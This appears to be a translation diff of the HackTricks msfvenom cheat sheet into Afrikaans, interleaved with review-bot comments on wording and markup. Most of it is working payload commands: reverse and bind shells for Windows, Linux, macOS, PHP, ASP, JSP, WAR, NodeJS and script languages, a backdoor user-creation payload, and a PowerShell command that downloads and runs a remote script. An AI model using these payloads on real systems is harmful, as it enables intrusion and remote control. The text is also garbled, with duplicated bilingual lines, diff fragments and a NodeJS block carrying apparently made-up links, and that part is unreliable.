* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters!
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
**Hacking-insigte**\
Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
**Hack-nuus in werklikheid**\
Bly op hoogte van die vinnige wêreld van hacking deur werklikheidsnuus en insigte
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
**Nuutste aankondigings**\
Bly ingelig met die nuutste foutjagte wat begin en belangrike platform-opdaterings
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
***
## Basic msfvenom
## Basiese msfvenom
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
One can also use the `-a` to specify the architecture or the `--platform`
## Listing
'n Mens kan ook die `-a` gebruik om die argitektuur te spesifiseer of die `--platform`
## Lys van
```bash
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
```
## Algemene parameters wanneer 'n shellkode geskep word
## Common params when creating a shellcode
Wanneer jy 'n shellkode skep met `msfvenom`, kan jy verskeie parameters gebruik om die gewenste funksionaliteit en eienskappe van die shellkode te bepaal. Hier is 'n lys van algemene parameters wat jy kan gebruik:
- **`-p`** of **`--payload`**: Hiermee spesifiseer jy die tipe payload wat jy wil gebruik, soos `windows/meterpreter/reverse_tcp` of `linux/x86/shell_reverse_tcp`.
- **`-f`** of **`--format`**: Hiermee kies jy die formaat van die uitsetlêer, soos `exe`, `elf`, `raw`, of `asp`.
- **`-e`** of **`--encoder`**: Hiermee kies jy die enkoder wat gebruik moet word om die shellkode te versteek, soos `x86/shikata_ga_nai` of `x86/jmp_call_additive`.
- **`-b`** of **`--bad-chars`**: Hiermee spesifiseer jy 'slegte karakters' wat uit die shellkode verwyder moet word.
- **`-i`** of **`--iterations`**: Hiermee stel jy die aantal iterasies in wat gebruik moet word deur die enkoder.
- **`-a`** of **`--arch`**: Hiermee spesifiseer jy die teikenargitektuur, soos `x86`, `x64`, `armle`, of `aarch64`.
- **`-o`** of **`--out`**: Hiermee spesifiseer jy die uitvoernaam en -pad vir die gegenereerde shellkode.
- **`-v`** of **`--var-name`**: Hiermee spesifiseer jy die naam van die veranderlike wat gebruik moet word vir die shellkode.
Dit is slegs 'n paar van die algemene parameters wat jy kan gebruik wanneer jy 'n shellkode skep met `msfvenom`. Jy kan die volledige lys van parameters en hul opsies vind in die `msfvenom` dokumentasie.
```bash
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
```
## **Windows**
### **Reverse Shell**
### **Omgekeerde Skulp**
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
```
{% endcode %}
### Bind Shell
### Bind Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
```
{% endcode %}
### Create User
{% code overflow="wrap" %}
### Skep Gebruiker
{% code %}
```bash
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
```
{% endcode %}
### CMD Shell
### CMD Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
```
{% endcode %}
### **Execute Command**
{% code overflow="wrap" %}
### **Voer Opdrag Uit**
{% code %}
```bash
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe
```
{% endcode %}
### Encoder
### Koder
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
```
{% endcode %}
### Embedded inside executable
### Ingesluit binne uitvoerbare lêer
{% code overflow="wrap" %}
```bash
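Review bot: the "Skep Gebruiker" and "Voer Opdrag Uit" blocks in this hunk replace `{% code overflow="wrap" %}` with a bare `{% code %}`, which drops line wrapping for exactly the two blocks with the longest one-liners (the `powershell "IEX(New-Object Net.webClient).downloadString(...)"` command will now run off the page); restore `overflow="wrap"` on both. Two further problems in the "Common params" section: the translated heading `## Algemene parameters wanneer 'n shellkode geskep word` is immediately followed by the untranslated `## Common params when creating a shellcode`, so the heading now appears twice, and the bullet list that follows (`-p`, `-f`, `-e`, `-b`, ...) has no counterpart in the English source. That added text is also technically off on one point: it says `-b` names characters to be "verwyder" (removed) from the shellcode, whereas `-b` lists the bytes the encoder must avoid producing; the payload is re-encoded until none of them appear, nothing is stripped. Keep one heading and drop the added list, or correct the `-b` description. Minor: in the HackenProof blurb, "Hack-nuus in werklikheid" reads as "hack news in reality"; "intydse" is the usual rendering of "real-time".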
@ -115,16 +116,14 @@ msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/wind
## Linux Payloads
### Reverse Shell
### Omgekeerde Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
```
{% endcode %}
### Bind Shell
### Bind Skulp
{% code overflow="wrap" %}
```bash
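Review bot: the section heading `## Linux Payloads` is left in English in this hunk while its two subheadings are translated to `### Omgekeerde Skulp` and `### Bind Skulp`; either translate the section heading as well or leave the whole section in English, since a mixed heading tree looks like a partial merge. The commands themselves are unchanged, which is correct.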
@ -140,17 +139,15 @@ msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTAC
```
{% endcode %}
## **MAC Payloads**
## **MAC-payloads**
### **Reverse Shell:**
### **Omgekeerde Skulp:**
{% code overflow="wrap" %}
```bash
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
```
{% endcode %}
### **Bind Shell**
### **Bind Skulp**
{% code overflow="wrap" %}
```bash
@ -158,11 +155,11 @@ msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho
```
{% endcode %}
## **Web Based Payloads**
## **Web Gebaseerde Payloads**
### **PHP**
#### Reverse shel**l**
#### Omgekeerde skul**l**
{% code overflow="wrap" %}
```bash
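Review bot: the PHP heading `#### Omgekeerde skul**l**` carries over the split-bold typo from the source line `#### Reverse shel**l**` and in doing so misspells the Afrikaans word (it should be "skulp", not "skull"); write it as `#### Omgekeerde skulp` to match the JSP heading later in this file. A translation pass is the natural place to fix a source typo rather than reproduce it.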
@ -173,18 +170,16 @@ cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> s
### ASP/x
#### Reverse shell
#### Omgekeerde dop
{% code overflow="wrap" %}
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
```
{% endcode %}
### JSP
#### Reverse shell
#### Omgekeerde skulp
{% code overflow="wrap" %}
```bash
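Review bot: the ASP/x heading in this hunk is translated as `#### Omgekeerde dop` while the JSP heading a few lines down, and every Windows/Linux/macOS heading earlier in the file, uses "skulp" (`#### Omgekeerde skulp`, `### Bind Skulp`); use a single term for "shell" throughout the page. The msfvenom commands are unchanged, as they should be.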
@ -192,23 +187,55 @@ msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f r
```
{% endcode %}
### WAR
### OORLOG
#### Reverse Shell
#### Omgekeerde Skulp
{% code overflow="wrap" %}
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
```
{% endcode %}
{% code %}
### NodeJS
### NodeJS
NodeJS is 'n platform wat toelaat dat jy JavaScript kan hardloop op die bedienerkant. Dit is 'n baie gewilde platform vir die ontwikkeling van webtoepassings en API's. Hier is 'n paar nuttige inligting en hulpbronne vir die gebruik van NodeJS in jou hakprojekte:
#### NodeJS Inligting
- [NodeJS amptelike webwerf](https://nodejs.org/)
- [NodeJS dokumentasie](https://nodejs.org/en/docs/)
- [NodeJS op GitHub](https://github.com/nodejs/node)
#### NodeJS Hakhulpmiddels
- [NodeJS Meterpreter](https://www.metasploitunleashed.org/Nodejs_Meterpreter)
- [NodeJS Reverse Shell](https://www.metasploitunleashed.org/Nodejs_Reverse_Shell)
- [NodeJS Web Shell](https://www.metasploitunleashed.org/Nodejs_Web_Shell)
#### NodeJS Haktegnieke
- [NodeJS Haktegnieke](https://www.metasploitunleashed.org/Nodejs_Hacking)
#### NodeJS Hakbronkode
- [NodeJS Hakbronkode](https://github.com/search?q=nodejs+hack)
#### NodeJS Haklekkasies
- [NodeJS Haklekkasies](https://hackerone.com/hacktivity?query=nodejs)
#### NodeJS Hakgemeenskap
- [NodeJS Hakgemeenskap](https://www.reddit.com/r/NodejsHacking/)
{% endcode %}
```bash
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```
## **Script Language payloads**
## **Skrips Taal payloads**
### **Perl**
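Review bot: `### WAR` must not become `### OORLOG`; WAR here is the Java Web ARchive format that `-f war` produces, a file-format acronym, not the English word "war", and the heading should stay `### WAR`. The NodeJS section in the same hunk is structurally broken: after the WAR block's `{% endcode %}` a new `{% code %}` opens, wraps a duplicated `### NodeJS` heading and several paragraphs of prose and link lists, and is closed by `{% endcode %}` just before the ```bash fence, so the `msfvenom -p nodejs/shell_reverse_tcp ...` command ends up outside the code block while prose sits inside it. None of that prose is in the English source, and the links it introduces (`metasploitunleashed.org/Nodejs_Meterpreter`, `.../Nodejs_Reverse_Shell`, `reddit.com/r/NodejsHacking`) are not references the page previously carried; they should not be added without being checked. Suggest restoring the original shape: one `### NodeJS` heading, `{% code overflow="wrap" %}`, the command, `{% endcode %}`. Minor: `## **Skrips Taal payloads**` reads awkwardly; "Skriptaal-payloads" is closer to the English "Script Language payloads".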
@ -216,16 +243,12 @@ msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
```bash
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
```
{% endcode %}
### **Python**
{% code overflow="wrap" %}
```bash
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
```
{% endcode %}
### **Bash**
{% code overflow="wrap" %}
@ -236,29 +259,29 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters!
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
**Hacking-insigte**\
Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
**Real-Time Hack Nuus**\
Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
**Nuutste aankondigings**\
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
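Review bot: the HackenProof blurb in this footer hunk says `**Real-Time Hack Nuus**` while the identical blurb in the page header earlier in the same file says `**Hack-nuus in werklikheid**`, and "in werklikheid" means "in reality", not "real-time"; both copies should use one correct rendering ("Intydse hack-nuus" or the English term). The same footer also translates "github repos" as "github-opslag" where the header of this file uses "github-repos"; a single shared footer snippet would avoid this drifting per file.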